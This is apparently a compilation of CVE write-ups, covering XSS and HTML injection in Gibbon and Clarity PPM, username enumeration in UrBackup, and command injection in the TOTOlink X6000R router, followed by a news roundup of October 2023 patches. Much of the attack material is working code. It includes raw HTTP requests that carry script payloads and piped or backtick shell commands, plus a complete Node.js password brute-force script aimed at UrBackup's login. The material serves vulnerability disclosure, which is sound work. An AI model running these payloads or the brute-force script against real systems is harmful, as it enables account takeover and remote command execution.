GibbonEdu Gibbon through version 25.0.0 allows /modules/Planner/resources_addQuick_ajaxProcess.php file upload with resultant XSS. The imageAsLinks parameter must be set to Y to return HTML code. The filename attribute of the bodyfile1 parameter is reflected in the response.

**usd-2023-0024 | Cross-Site Scripting**

**Advisory ID**: usd-2023-0024  
**Product**: Gibbon  
**Affected Version**: 25.0.00  
**Vulnerability Type**: CWE-79  
**Security Risk**: High  
**Vendor URL**: https://gibbonedu.org  
**Vendor acknowledged vulnerability**: Yes  
**Vendor Status**: Fixed  
**CVE number**: CVE-2023-45881

**Desciption**

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes  
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.

A reflected XSS was found in the filename of uploaded files.  
This can lead to the creation of arbitrary high privileged accounts.

**Proof of Concept**

The application allows to upload files without prior authentication using the

/modules/Planner/resources\_addQuick\_ajaxProcess.php

endpoint.

The following request can be used to upload files to the server:

POST /modules/Planner/resources\_addQuick\_ajaxProcess.php HTTP/1.1
Host: localhost:8080
\[...\]

------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="id"

body
------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyaddress"


------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile1"; filename="../<img src=X onerror=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>.gif"
Content-Type: text/plain

<!DOCTYPE html>
<html><h1>hello</h1>/html>

------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile2"


------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile3"


------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile4"


------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="imagesAsLinks"

Y
------WebKitFormBoundaryeSZWbY4RNteSpbi4--

The **imagesAsLinks** parameter must be set to **Y** to return HTML code.  
The _filename_ attribute of the **bodyfile1** parameter is reflected in the response.

The response of the request will look like:

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: G5ad8ffa23a25972f=uauluvtju3kvlave1ushepkvjo; path=/; HttpOnly; SameSite=Lax
\[...\]

&lta target='\_blank' style='font-weight: bold' href='http://localhost:8080/uploads/2023/07/imgsrcXonerrorevalatobYWxlcnQoZG9jdW1lbnQuZG9tYWluKQ\_Go0qk7tKRgW0S9X8.gif'>&ltimg src=X onerror=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>

**Fix**

It is recommended to treat all input on the website as potentially dangerous.

**References**

*   https://cwe.mitre.org/data/definitions/79.html

**Timeline**

*   **2023-07-11**: Vulnerability identified by Christian Poeschl
*   **2023-09-19**: Security Release v25.0.01
*   **2023-11-02**: Advisory published

**Credits**

This security vulnerability was identified by Christian Poeschl of usd AG.

CVE-2023-45881: usd-2023-0024 - usd HeroLab

GibbonEdu Gibbon version 25.0.0 allows HTML Injection via an IFRAME element to the Messager component.

**usd-2023-0019 | HTML Injection**

**Advisory ID**: usd-2023-0019  
**Product**: Gibbon (https://gibbonedu.org/)  
**Affected Version**: 25.0.00  
**Vulnerability Type**: CWE-79  
**Security Risk**: Medium  
**Vendor URL**: https://gibbonedu.org  
**Vendor acknowledged vulnerability**: Yes  
**Vendor Status**: Fixed  
**CVE number**: CVE-2023-45879

**Desciption**

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes  
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.

A user with permissions to send messages can inject an **iframe** into the application.  
This can be used to abuse a XSS/CSRF vulnerability in the admin backend, to create a new admin user.

The message can be send to an existing admin user. When the target opens the message, the (hidden) **iframe** will be embedded into the application.

**Proof of Concept**

To create the message, navigate to the _Home > Messenger > New Message_ site.

Fill the form and select an admin user as reciepent. Intercept the request and change the message body to

<iframe src="http://responsible-disclosure:8989/index.html"></iframe>

POST /modules/Messenger/messenger\_postProcess.php HTTP/1.1
Host: localhost:8080
\[...\]

------WebKitFormBoundaryHs6JkrrxpoUfeRfX
Content-Disposition: form-data; name="address"


/modules/Messenger/messenger\_post.php
------WebKitFormBoundaryHs6JkrrxpoUfeRfX
Content-Disposition: form-data; name="subject"

test
------WebKitFormBoundaryHs6JkrrxpoUfeRfX
Content-Disposition: form-data; name="body"

<p><iframe src="http://localhost:8989/index.html"></iframe></p>
------WebKitFormBoundaryHs6JkrrxpoUfeRfX
\[...\]
Content-Disposition: form-data; name="individualList\[\]"

0000000001
------WebKitFormBoundaryHs6JkrrxpoUfeRfX--

As shown in the screenshot below, the iframe is injected into the message.  

**Fix**

It is recommended to treat all input on the website as potentially dangerous.

**References**

*   https://owasp.org/www-project-web-security-testing-guide/latest/4-Web\_Application\_Security\_Testing/11-Client-side\_Testing/03-Testing\_for\_HTML\_Injection

**Timeline**

*   **2023-06-27**: Vulnerability identified by Christian Poeschl
*   **2023-09-19**: Security Release v25.0.01
*   **2023-11-02**: Advisory published

**Credits**

This security vulnerability was identified by Christian Poeschl of usd AG.

CVE-2023-45879: usd-2023-0019 - usd HeroLab

Jaspersoft Clarity PPM version 14.3.0.298 was discovered to contain an arbitrary file upload vulnerability via the Profile Picture Upload function.

==================================================================================================================================  
# Title     : Insufficient input validation , in CA PPM 14.3 allows remote attackers to execute stored cross-site scripting   attacks.                                                     |  
# Author    : Kaizen                                                                                                       |  
# Tested on : windows 10 / browser : Chrome Version 114.0.5735.133 (Official Build) (x86_64)                                           |  
# Vendor    : https://www.broadcom.com/                                                                                             
# Dork      : https://www.broadcom.com/products/software/value-stream-management/clarity                                      |  
#Affected Product Version: Clarity PPM 14.3.0.298 / Jaspersoft  
#CVE Assigned: CVE-2023-37790  
==================================================================================================================================

POC:

Header: Content-Type: text/html; charset=utf-8

Payload: <body onload=alert(document.cookie)>

HTTP Request:  
POST /niku/nu?uitk.vxml.form=1&action=projmgr.avatarPhotoUpload&2097152&Error%20CMN-01035:%20The%20file%20size%20exceeds%202%20MB%20limit%20or%20file%20type%20is%20not%20supported.%20Please%20try%20again.&uitk.navigation.location=Modal&uitk.navigation.parent.location=Modal&uitk.navigation.last.workspace.action=npt.overview HTTP/1.1

[REDACTED]

------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="avatar_photo"

------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="avatar_photo_ODF_New_Attachment_File_Name"; filename="payload.png"  
Content-Type: text/html; charset=utf-8

<body onload=alert(document.cookie)>  
------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="superSecretTokenKey"

superSecretTokenValue  
------WebKitFormBoundaryr7Mas24AkgGJH4HE--

HTTP Response:

HTTP/1.1 200 OK  
content-disposition: inline;filename="payload.png"  
Content-Type: text/html;charset=utf-8  
Content-Length: 90  
Date: Thu, 06 Jul 2023 07:33:24 GMT  
Connection: close  
Server: CA PPM

<body onload=alert(document.cookie)>

To Trigger Stored XSS visit user profile picture.

https://127.0.0.1/niku/app?action=union.viewODFFile&objectType=resource&odf_pk=5763513&fileId=5178985&versionId=51[REDACTED]hXm0r7tSeUqEr=true

CVE-2023-37790: Clarity PPM 14.3.0.298 Cross Site Scripting ≈ Packet Storm

UrBackup Server 2.5.31 allows brute-force enumeration of user accounts because a failure message confirms that a username is not valid.

Starting with the first step, access the login page at localhost:55414. The login page includes fields for username and password, and it lacks captcha or any other controls to prevent automated form submissions. We observed that this allows perpetrators to brute-force the login request.

Next, we begin to understand how UrBackup works. We first try using the username "root". The result shows that "User does not exist". From this, we can easily deduce that this user does not exist.

We then try using a common username credential that might be used by most administrators, which can be found here. If we are lucky, the admin might be using one of the existing usernames from the wordlist similar to my demonstration, which shows that the username "admin" exists; however, the popup indicates "Wrong password".

The first request is sent to /x?a=salt and the response contains a cryptographic setting

The cryptographic JavaScript function that performs a password calculation is located on the client side.

1\. Prepare a list of existing usernames (in this case "admin")

2\. Prepare a password wordlist (in this case is "pass.txt")

3\. Run below code to automate brute-force

    
    
    import axios from 'axios';
    import fs from 'fs/promises';
    import qs from 'qs';  
    import sjcl from 'sjcl';
    import { HttpProxyAgent } from 'http-proxy-agent';
    
                   const proxyAgent = new HttpProxyAgent('http://127.0.0.1:8080');
    var blks = null;
    var nblk = null;
    var i = null;
    var x = null;
    var a = null;
    var b = null;
    var c = null;
    var d = null;
    var olda = null;
    var oldb = null;
    var oldc = null;
    var oldd = null;
    var str = null;
    var j = null;
    var hex_chr = "0123456789abcdef";
    function rhex(num)
    {
      str = "";
      for(j = 0; j <= 3; j++)
        str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) +
               hex_chr.charAt((num >> (j * 8)) & 0x0F);
      return str;
    }
    function str2blks_MD5(str)
    {
      nblk = ((str.length + 8) >> 6) + 1;
      blks = new Array(nblk * 16);
      for(i = 0; i < nblk * 16; i++) blks[i] = 0;
      for(i = 0; i < str.length; i++)
        blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);
      blks[i >> 2] |= 0x80 << ((i % 4) * 8);
      blks[nblk * 16 - 2] = str.length * 8;
      return blks;
    }
    function add(x, y)
    {
      var lsw = (x & 0xFFFF) + (y & 0xFFFF);
      var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
      return (msw << 16) | (lsw & 0xFFFF);
    }
    function rol(num, cnt)
    {
      return (num << cnt) | (num >>> (32 - cnt));
    }
    function cmn(q, a, b, x, s, t)
    {
      return add(rol(add(add(a, q), add(x, t)), s), b);
    }
    function ff(a, b, c, d, x, s, t)
    {
      return cmn((b & c) | ((~b) & d), a, b, x, s, t);
    }
    function gg(a, b, c, d, x, s, t)
    {
      return cmn((b & d) | (c & (~d)), a, b, x, s, t);
    }
    function hh(a, b, c, d, x, s, t)
    {
      return cmn(b ^ c ^ d, a, b, x, s, t);
    }
    function ii(a, b, c, d, x, s, t)
    {
      return cmn(c ^ (b | (~d)), a, b, x, s, t);
    }
    function calcMD5(str)
    {
      x = str2blks_MD5(str);
      a =  1732584193;
      b = -271733879;
      c = -1732584194;
      d =  271733878;
      for(i = 0; i < x.length; i += 16)
      {
        olda = a;
        oldb = b;
        oldc = c;
        oldd = d;
        a = ff(a, b, c, d, x[i+ 0], 7 , -680876936);
        d = ff(d, a, b, c, x[i+ 1], 12, -389564586);
        c = ff(c, d, a, b, x[i+ 2], 17,  606105819);
        b = ff(b, c, d, a, x[i+ 3], 22, -1044525330);
        a = ff(a, b, c, d, x[i+ 4], 7 , -176418897);
        d = ff(d, a, b, c, x[i+ 5], 12,  1200080426);
        c = ff(c, d, a, b, x[i+ 6], 17, -1473231341);
        b = ff(b, c, d, a, x[i+ 7], 22, -45705983);
        a = ff(a, b, c, d, x[i+ 8], 7 ,  1770035416);
        d = ff(d, a, b, c, x[i+ 9], 12, -1958414417);
        c = ff(c, d, a, b, x[i+10], 17, -42063);
        b = ff(b, c, d, a, x[i+11], 22, -1990404162);
        a = ff(a, b, c, d, x[i+12], 7 ,  1804603682);
        d = ff(d, a, b, c, x[i+13], 12, -40341101);
        c = ff(c, d, a, b, x[i+14], 17, -1502002290);
        b = ff(b, c, d, a, x[i+15], 22,  1236535329);    
        a = gg(a, b, c, d, x[i+ 1], 5 , -165796510);
        d = gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
        c = gg(c, d, a, b, x[i+11], 14,  643717713);
        b = gg(b, c, d, a, x[i+ 0], 20, -373897302);
        a = gg(a, b, c, d, x[i+ 5], 5 , -701558691);
        d = gg(d, a, b, c, x[i+10], 9 ,  38016083);
        c = gg(c, d, a, b, x[i+15], 14, -660478335);
        b = gg(b, c, d, a, x[i+ 4], 20, -405537848);
        a = gg(a, b, c, d, x[i+ 9], 5 ,  568446438);
        d = gg(d, a, b, c, x[i+14], 9 , -1019803690);
        c = gg(c, d, a, b, x[i+ 3], 14, -187363961);
        b = gg(b, c, d, a, x[i+ 8], 20,  1163531501);
        a = gg(a, b, c, d, x[i+13], 5 , -1444681467);
        d = gg(d, a, b, c, x[i+ 2], 9 , -51403784);
        c = gg(c, d, a, b, x[i+ 7], 14,  1735328473);
        b = gg(b, c, d, a, x[i+12], 20, -1926607734);
        
        a = hh(a, b, c, d, x[i+ 5], 4 , -378558);
        d = hh(d, a, b, c, x[i+ 8], 11, -2022574463);
        c = hh(c, d, a, b, x[i+11], 16,  1839030562);
        b = hh(b, c, d, a, x[i+14], 23, -35309556);
        a = hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
        d = hh(d, a, b, c, x[i+ 4], 11,  1272893353);
        c = hh(c, d, a, b, x[i+ 7], 16, -155497632);
        b = hh(b, c, d, a, x[i+10], 23, -1094730640);
        a = hh(a, b, c, d, x[i+13], 4 ,  681279174);
        d = hh(d, a, b, c, x[i+ 0], 11, -358537222);
        c = hh(c, d, a, b, x[i+ 3], 16, -722521979);
        b = hh(b, c, d, a, x[i+ 6], 23,  76029189);
        a = hh(a, b, c, d, x[i+ 9], 4 , -640364487);
        d = hh(d, a, b, c, x[i+12], 11, -421815835);
        c = hh(c, d, a, b, x[i+15], 16,  530742520);
        b = hh(b, c, d, a, x[i+ 2], 23, -995338651);
        a = ii(a, b, c, d, x[i+ 0], 6 , -198630844);
        d = ii(d, a, b, c, x[i+ 7], 10,  1126891415);
        c = ii(c, d, a, b, x[i+14], 15, -1416354905);
        b = ii(b, c, d, a, x[i+ 5], 21, -57434055);
        a = ii(a, b, c, d, x[i+12], 6 ,  1700485571);
        d = ii(d, a, b, c, x[i+ 3], 10, -1894986606);
        c = ii(c, d, a, b, x[i+10], 15, -1051523);
        b = ii(b, c, d, a, x[i+ 1], 21, -2054922799);
        a = ii(a, b, c, d, x[i+ 8], 6 ,  1873313359);
        d = ii(d, a, b, c, x[i+15], 10, -30611744);
        c = ii(c, d, a, b, x[i+ 6], 15, -1560198380);
        b = ii(b, c, d, a, x[i+13], 21,  1309151649);
        a = ii(a, b, c, d, x[i+ 4], 6 , -145523070);
        d = ii(d, a, b, c, x[i+11], 10, -1120210379);
        c = ii(c, d, a, b, x[i+ 2], 15,  718787259);
        b = ii(b, c, d, a, x[i+ 9], 21, -343485551);
        a = add(a, olda);
        b = add(b, oldb);
        c = add(c, oldc);
        d = add(d, oldd);
      }
      console.log(rhex(a) + rhex(b) + rhex(c) + rhex(d));
      return rhex(a) + rhex(b) + rhex(c) + rhex(d);
    }
    
    const main = async () => {
        try {
            const passwords = await fs.readFile('pass.txt', 'utf8');
            const passwordArray = passwords.split('\n').map(pw => pw.trim());
            for (const password of passwordArray) {
                console.log(password)
              
                const url1 = 'http://localhost:55414/x?a=salt';
                const data1 = qs.stringify({
                    username: 'admin',
                    ses: '4Eu9JKihHNT6CH8esJQ0mn3ga9G7vJ',
                    lang: 'en'
                });
                const response1 = await axios.post(url1, data1, {
                    headers: {
                        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
                        "Accept": "application/json, text/javascript, */*; q=0.01",
                        "Accept-Language": "en-US,en;q=0.5",
                        "Accept-Encoding": "gzip, deflate",
                        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                        "X-Requested-With": "XMLHttpRequest",
                        "Origin": "http://localhost:55414",
                        "Referer": "http://localhost:55414"
                    },httpAgent: proxyAgent,  
                    httpsAgent: proxyAgent 
                });
                console.log(response1.data);
                const { rnd, salt, ses } = response1.data;
                if (!rnd || !salt) {
                    console.log('Failed to retrieve rnd or salt');
                    continue;
                }
    
                let pwmd5 = calcMD5(salt + password);
                if (10000 > 0) {
                    pwmd5 = sjcl.codec.hex.fromBits(sjcl.misc.pbkdf2(sjcl.codec.hex.toBits(pwmd5), salt, 10000));
                }
                pwmd5 = calcMD5(rnd + pwmd5); 
                const url2 = 'http://localhost:55414/x?a=login';
                const data2 = {
                    username: 'admin',
                    password: pwmd5,
                    ses: ses || '4Eu9JKihHNT6CH8esJQ0mn3ga9G7vJ',
                    lang: 'en'
                };
                
                const response2 = await axios.post(url2, qs.stringify(data2), {  
                    headers: {
                        "Accept": "application/json, text/javascript, */*; q=0.01",
                        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",  
                        "sec-ch-ua": '"Not;A Brand";v="99", "Chromium";v="106"',
                        "X-Requested-With": "XMLHttpRequest",
                        "sec-ch-ua-mobile": "?0",
                        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36",
                        "sec-ch-ua-platform": '"Windows"',
                        "Origin": "http://localhost:55414",
                        "Sec-Fetch-Site": "same-origin",
                        "Sec-Fetch-Mode": "cors",
                        "Sec-Fetch-Dest": "empty",
                        "Referer": "http://localhost:55414/",
                        "Accept-Encoding": "gzip, deflate",
                        "Accept-Language": "en-US,en;q=0.9",
                        "Connection": "close"
                    },httpAgent: proxyAgent,  
                    httpsAgent: proxyAgent 
                });
                
                console.log(response2.data);
            }
        } catch (error) {
            console.error('An error occurred:', error);
        }
    };
    main();
    
                   
                

All requests made by the automation script.

An incorrect hash password will return a JSON with an error type of 2.

A correct hash password will return attributes of the settings, and the response length will be different.

CVE-2023-47102: Quantiano

An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setTracerouteCfg function of the stecgi.cgi component.

**TOTOlink X6000R V9.4.0cu.852\_B20230719 command injection****Produce information**

Device：TOTOlink X6000R  
Firmware version：V9.4.0cu.852\_B20230719  
Manufacturer’s website information：https://www.totolink.net/  
The firmware download address：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/247/ids/36.html

**Vulnerability description**

Arbitrary command execution exists on the setTracerouteCfg interface of cstecgi .cgi

**poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

    POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 172.28.60.132Content-Length: 76Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://172.28.60.132Referer: http://172.28.60.132/advance/diagnosis.html?time=1694021202884Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"command":"127.0.0.1|ls>/web/test2.txt|","num":"1","topicurl":"setTracerouteCfg"}

Inject the command “ls>/web/tes2t.txt”

Injection result:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

    GET /test3.txt HTTP/1.1Host: 172.28.60.132Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

**Analyse**

The function in the shttp

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  

    __int64 __fastcall sub_415950(__int64 a1, __int64 a2){  const char *v4; // x22  const char *v5; // x0  unsigned int v6; // w0  char s[256]; // [xsp+38h] [xbp+38h] BYREF  memset(s, 0, sizeof(s));  v4 = (const char *)sub_40BD6C(a1, "command");  v5 = (const char *)sub_40BD6C(a1, "num");  v6 = atoi(v5);  if ( (unsigned int)(snprintf(s, 0x100uLL, "traceroute -m %d %s&>/var/log/traceRouteLog", v6, v4) + 1) > 0x100 )    __break(0x3E8u);  CsteSystem(s, 0LL);  sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv");  return 0LL;}

There is a command splicing that bypasses execution without any filtering!

CVE-2023-46485: TOTOlink X6000R command injection(setTracerouteCfg)

An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setLedCfg function.

**TOTOlink X6000R command injection****Product Information**

Device: TOTOlink X6000R  
Firmware version: V9.4.0cu.852\_B20230719  
Manufacturer’s website information：https://www.totolink.net/  
The firmware download address：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/247/ids/36.html

**Vulnerability description**

There is arbitrary command execution on the setLedCfg interface of cstecgi .cgi

**poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

    POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 172.28.60.132Content-Length: 55Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://172.28.60.132Referer: http://172.28.60.132/basic/qos.html?time=1694023460381Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"enable":"`ls>/web/test5.txt`","topicurl":"setLedCfg"}

Inject commands： “ls>/web/test5.txt”

Test results.

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

    GET /test5.txt HTTP/1.1Host: 172.28.60.132Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

**Analysis**

The following functions in shttp

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  

    __int64 __fastcall sub_411F90(__int64 a1, __int64 a2){  const char *v3; // x20  unsigned int v4; // w19  v3 = (const char *)sub_40BD6C(a1, "enable");  v4 = atoi(v3);  if ( *v3 && v4 <= 1 )  {    Uci_Set_Str(11LL, "main", "led_status", v3);    Uci_Commit(11LL);    set_led_status(v4);  }  datconf_set_by_key("/var/cste/temp_status", "mesh_update", "1");  sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv");  return 0LL;}

There is an enable variable command splicing to bypass the execution, without any filtering!

The root cause comes from the following

Since the Uci\_Set\_Str function command arguments of the libcscommon.so library in shttpd are susceptible to operating system command injection. When the program calls get\_uci2json, it will call Uci\_Set\_Str in the so library, causing arbitrary command execution, and the permissionless operation of the interface setLanguageCfg leads to unauthorized arbitrary command execution.

In this part of shttpd, the relevant language settings are called

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  
31  
32  
33  
34  
35  
36  
37  
38  
39  
40  
41  
42  
43  
44  
45  
46  
47  
48  
49  
50  
51  
52  
53  
54  
55  

    __int64 __fastcall sub_4117F8(__int64 a1, __int64 a2){  const char *v4; // x22  const char *v5; // x23  int v6; // w0  int v8; // [xsp+44h] [xbp+44h] BYREF  char s[8]; // [xsp+48h] [xbp+48h] BYREF  __int64 v10; // [xsp+50h] [xbp+50h]  __int64 v11; // [xsp+58h] [xbp+58h]  __int64 v12; // [xsp+60h] [xbp+60h]  __int64 v13; // [xsp+68h] [xbp+68h]  __int64 v14; // [xsp+70h] [xbp+70h]  __int64 v15; // [xsp+78h] [xbp+78h]  __int64 v16; // [xsp+80h] [xbp+80h]  __int64 v17[8]; // [xsp+88h] [xbp+88h] BYREF  v4 = (const char *)sub_40BD6C(a1, "lang");  v5 = (const char *)sub_40BD6C(a1, "langAutoFlag");  v8 = 0;  *(_QWORD *)s = 0LL;  v10 = 0LL;  v11 = 0LL;  v12 = 0LL;  v13 = 0LL;  v14 = 0LL;  v15 = 0LL;  v16 = 0LL;  memset(v17, 0, sizeof(v17));  Uci_Set_Str();  Uci_Get_Int(11LL, "main", "lang_auto_flag", &v8);  v6 = atoi(v5);  if ( v6 != v8 )    Uci_Set_Str();  Uci_Commit(11LL);  snprintf(s, 0x40uLL, "helpurl_%s", v4);  Uci_Get_Str(15LL, "custom", s, v17);  if ( LOBYTE(v17[0]) )  {    *(_QWORD *)s = 0LL;    v10 = 0LL;    v11 = 0LL;    v12 = 0LL;    v13 = 0LL;    v14 = 0LL;    v15 = 0LL;    v16 = 0LL;    snprintf(s, 0x40uLL, "http://%s", (const char *)v17);  }  else  {    strcpy(s, "");  }  sub_40BDA0(a2, 1LL, "", 0LL, "0", s);  return 0LL;}

现在来看libcscommon.so

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  

    ABEL_57:  while ( 1 )  {    off_2AB30(v12, 1024LL, "uci -c %s set %s.%s.%s=\"%s\"", v9, v10, a2, a3, a4);    off_2AD78(v12, 0LL);    result = 1LL;LABEL_58:    if ( v13 == *(_QWORD *)off_2A970 )      break;    off_2AC18();LABEL_60:    v9 = "/tmp/cste/";    v10 = "system_status";  }  return result;

The off\_2AD78 of them is LOAD:000000000002AD78 18 60 00 00 00 00 00 00 off\_2AD78 DCQ CsteSystem

That is, system

CVE-2023-46484: TOTOlink X6000R command injetction (setLedCfg)

Plus: Major vulnerability fixes are now available for a number of enterprise giants, including Cisco, VMWare, Citrix, and SAP.

October has been a security flaw-fest, with Apple, Microsoft, and Google issuing patches for vulnerabilities that are being used in real-life attacks. There were also multiple enterprise fixes during the month, with Cisco, VMWare, and Citrix fixing serious security bugs.

Some of the patches are more urgent than others, so read on to find out what you need to know about the updates released in October.

Apple iOS and iPad OS

October was a busy month for Apple, with the iPhone maker issuing its second set of fixes as part of iOS 17.1 at the end of the month. The two dozen security fixes in iOS 17.1 include patches for serious flaws in the Kernel at the heart of the iOS operating system and WebKit, the engine that underpins the Safari browser.

Tracked as CVE-2023-42849, the Kernel issue fixed in iOS 17.1 could allow an attacker that has already achieved code execution to bypass memory mitigations, Apple said on its support page. The three WebKit flaws—tracked as CVE-2023-40447, CVE-2023-41976, and CVE-2023-42852—could lead to arbitrary code execution.

Apple has also issued iOS and iPad OS 16.7.2, fixing the same flaws for users of older devices or those who don’t want to upgrade right away. They came alongside macOS Sonoma 14.1, macOS Ventura 13.6, macOS Monterey 12.7.1, tvOS 17.1, WatchOS 10.1, and Safari 17.1.

Earlier this month, Apple released iOS 17.0.3 and iOS 16.7.1, fixing issues being used in real-life attacks. Tracked as CVE-2023-42824, the first is a Kernel bug that could allow an attacker with access to your device to elevate their privileges.

Apple also fixed CVE-2023-5217, a buffer overflow flaw that could allow an attacker to execute code. Affecting multiple browsers and platforms, the bug has already been patched in Google’s Chrome browser.

Microsoft

Microsoft’s Patch Tuesday has seen the tech giant fix over 100 flaws, including two zero-day vulnerabilities in Microsoft WordPad and Skype for Business.

CVE-2023-36563 is an information disclosure bug in the WordPad word processing program that could expose NTLM hashes and result in NTLM relay attacks. However, it requires user interaction: The attacker must send someone a malicious file and convince them to open it, Microsoft said.

CVE-2023-41763 is an elevation of privilege vulnerability in Skype for Business. “An attacker could make a specially crafted network call to the target Skype for Business server, which could cause the parsing of an http request made to an arbitrary address,” potentially disclosing IP addresses or port numbers, Microsoft said.

Microsoft also patched a flaw in Message Queuing tracked as CVE-2023-35349 with a CVSS critical score of 9.8, which could allow an unauthenticated attacker to remotely execute code.

October’s Patch Tuesday is a particularly urgent one, so it’s important to update as soon as you can.

Google Chrome

Google has released 20 security fixes for its Chrome browser, including one patch for a flaw rated as critical. Tracked as CVE-2023-5218, the bug is a use-after-free issue in Site Isolation. Another six fixes cover inappropriate implementation vulnerabilities marked as having medium impact, while CVE-2023-5476 is a use-after-free flaw in Blink History. Another issue, CVE-2023-5474, is a heap buffer overflow in PDF, according to Google’s blog.

A further four inappropriate implementation vulnerabilities are rated as having a low impact, with Google also fixing a low severity use-after-free bug in Cast tracked as CVE-2023-5473.

None of the flaws fixed in October have been exploited, but given how actively the browser is targeted, it makes sense to update as soon as you can.

Google Android

Google’s October Android update was a major one because it fixed 53 issues, including two vulnerabilities already being used in real-life attacks. The first is CVE-2023-4863, a heap buffer overflow bug in libwebp affecting the applications that use the library to encode and decode images in the WebP format. This vulnerability impacts many applications and could be used to install spyware, security firm Malwarebytes wrote in a blog.

There are indications that the bug “may be under limited, targeted exploitation,” Google said in an advisory.

CVE-2023-4211 is an issue in Arm components rated as having a high impact, which Google said is also being used in attacks. “A local non-privileged user can make improper GPU memory processing operations to gain access to already freed memory,” Malwarebytes said, adding that the vulnerability affects multiple versions of Arm Mali GPU drivers. These are used in multiple Android device models, including those made by Google, Samsung, Huawei, and Xiaomi.

Another scary flaw in the System tracked as CVE-2023-40129 is rated as critical. “The \[vulnerability\] could lead to remote code execution with no additional execution privileges needed,” Google said.

The update is available for Google’s Pixel and Samsung’s Galaxy series, so if you have an Android device, check your settings ASAP.

Cisco

Software giant Cisco has released patches to fix two already exploited flaws. Tracked as CVE-2023-20198 and with an eye-watering CVSS score of 10, the first is an issue in the web user interface feature of Cisco IOS XE software. It affects physical and virtual devices running Cisco IOS XE software that also have the HTTP or HTTPS Server feature enabled, researchers at Cisco Talos said in a blog.

“Successful exploitation of CVE-2023-20198 allows an attacker to gain privilege level 15 access to the device, which the attacker can then use to create a local user and log in with normal user access,” the researchers warned.

The attacker can use the new unauthorized local user account to exploit a second vulnerability, CVE-2023-20273, in another component of the WebUI feature. “This allows the adversary to inject commands with elevated root privileges, giving them the ability to run arbitrary commands on the device,” said Talos Intelligence, Cisco’s cybersecurity firm.

